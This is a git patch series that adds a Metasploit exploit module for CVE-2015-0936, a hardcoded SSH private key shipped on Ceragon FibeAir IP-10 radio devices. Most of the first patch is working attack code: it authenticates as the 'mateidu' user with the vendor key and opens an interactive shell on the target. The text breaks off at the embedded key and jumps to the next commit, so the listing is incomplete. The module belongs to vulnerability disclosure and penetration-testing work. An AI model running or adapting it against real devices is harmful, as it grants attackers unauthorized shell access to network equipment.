From 8ec71e9daf2e1e46539914c8da74522c800c04ec Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 1 Apr 2015 14:05:41 -0500 Subject: [PATCH 1/3] Add a module for R7-2015-05 --- .../ssh/ceragon_fibeair_known_privkey.rb | 149 ++++++++++++++++++ 1 file changed, 149 insertions(+) create mode 100644 modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb new file mode 100644 index 0000000000..977440e347 --- /dev/null +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -0,0 +1,149 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class Metasploit3 < Msf::Exploit::Remote + include Msf::Auxiliary::Report + + Rank = ExcellentRanking + + def initialize(info = {}) + super(update_info(info, { + 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure', + 'Description' => %q{ + Ceragon ships a public/private key pair on FibeAir IP-10 devices + that allows passwordless authentication to any other IP-10 device. + Since the key is easily retrievable, an attacker can use it to + gain unauthorized remote access as the "mateidu" user. + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'Author' => [ + 'hdm', # Discovery + 'todb' # Metasploit module and advisory text (mostly copy-paste) + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-0936'], + ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure + ['URL', 'hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass + ], + 'DisclosureDate' => "Apr 01 2015", # Not a joke + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + })) + + register_options( + [ + # Since we don't include Tcp, we have to register this manually + Opt::RHOST(), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + # helper methods that normally come from Tcp + def rhost + datastore['RHOST'] + end + def rport + datastore['RPORT'] + end + + def do_login(user) + opt_hash = { + :auth_methods => ['publickey'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :key_data => [ key_data ], + :disable_agent => true, + :config => false, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, user, opt_hash) + end + rescue Rex::ConnectionError + return nil + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return nil + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return nil + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + return nil + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return nil + end + + if ssh_socket + + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + ssh_socket = nil + + return conn + else + return nil + end + end + + def exploit + conn = do_login("mateidu") + if conn + print_good "#{rhost}:#{rport} - Successful login" + handler(conn.lsock) + end + end + + def key_data + < Date: Wed, 1 Apr 2015 14:16:45 -0500 Subject: [PATCH 2/3] Fix reference --- modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index 977440e347..d093a8e10a 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2015-0936'], ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure - ['URL', 'hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass + ['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass ], 'DisclosureDate' => "Apr 01 2015", # Not a joke 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, From b17727d244a82726c2d1360548a0d4cdfdaf104d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 1 Apr 2015 14:35:45 -0500 Subject: [PATCH 3/3] Switching to privileged => false --- modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index d093a8e10a..04bcf198d2 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'Privileged' => true, + 'Privileged' => false, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => {